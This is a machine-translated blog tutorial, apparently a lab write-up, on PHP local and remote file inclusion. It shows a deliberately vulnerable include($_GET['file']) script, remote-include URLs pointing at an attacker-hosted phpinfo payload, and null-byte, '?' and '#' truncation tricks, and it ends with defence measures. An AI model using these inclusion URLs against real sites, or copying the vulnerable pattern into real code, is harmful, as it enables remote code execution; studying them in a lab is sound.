当前位置:网站首页>File contains vulnerabilities (II)

File contains vulnerabilities (II)

2022-07-02 05:45:00 A τθ

One 、 Contains remote files

1、 Principle analysis 

 When the remote file is opened , It can include remote files to execute locally . When  allow_url_fopen=On、allow_url_include=ON  Two conditions at the same time 
 by  On  Allow remote inclusion of files .

2、 Practice

2.1 Virtual machine building test.php

<?php
include $_GET['file'];

?>

Insert picture description here
Insert picture description here

2.2 python Set up resume server locally 

<?php
phpinfo();

?>
C:\Users\Administrator

Insert picture description here

2.3 The remote file contains 

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt

Insert picture description here

Two 、 The file contains a truncation attack 

 The file contains a truncation attack , stay  php  Version less than  5.3.4  Allow to use %00  truncation , In the use of  include  And other files contain functions , You can truncate the file name ,
 Truncation will be affected by  gpc influence , If  gpc by  On  when ,%00 Will be converted into \0  Truncation will fail .

<?php 
include $GET['file'].'.php';
?>
 Pass in  file  File name concatenation .php  In use  include  The introduction of the file .file  Controllable parameters will cause loopholes .

1、 File contains %00 truncation 

 Upload files with malicious code to the website directory , Include import and then  00  truncation .
 The current test version is  php 5.2.17,gpc=off

Insert picture description here 

http://192.168.127.132/test.php?file=1.jpg%00

Insert picture description here

2、 Remote include truncation

2.1 Principle analysis 

 Characters suitable for remote truncation are :
Symbol URL code
#%23
?%3f
00%00
 All the above characters can be truncated :

allow_url_fopen =On
allow_url_include=On

2.2 Environment building 

<?php
include $_GET['file'];

?>

Insert picture description here
Insert picture description here

2.3 python Set up resume server locally 

<?php
phpinfo();

?>
C:\Users\Administrator

Insert picture description here

2.4 The remote file contains 

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%00

Insert picture description here 

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%3f

Insert picture description here 

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%23

Insert picture description here

3、 ... and 、 Defense plan 

1. Strictly judge whether the included parameters are externally controllable , Because the key to successful exploitation of file containing vulnerabilities lies in whether the contained files can be controlled externally ;
2. Path restrictions : Restrict contained files to only one file , Be sure to prohibit directory jump characters , Such as :"../";
3. Include file validation : Verify that the included file is a member of the whitelist ;
4. Try not to use dynamic inclusion , It can be fixed on the page to be included , Such as :include('head.php').
5. Set up  allow_url_include by  Off
原网站

版权声明
本文为[A τθ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/183/202207020539073833.html

边栏推荐

猜你喜欢

随机推荐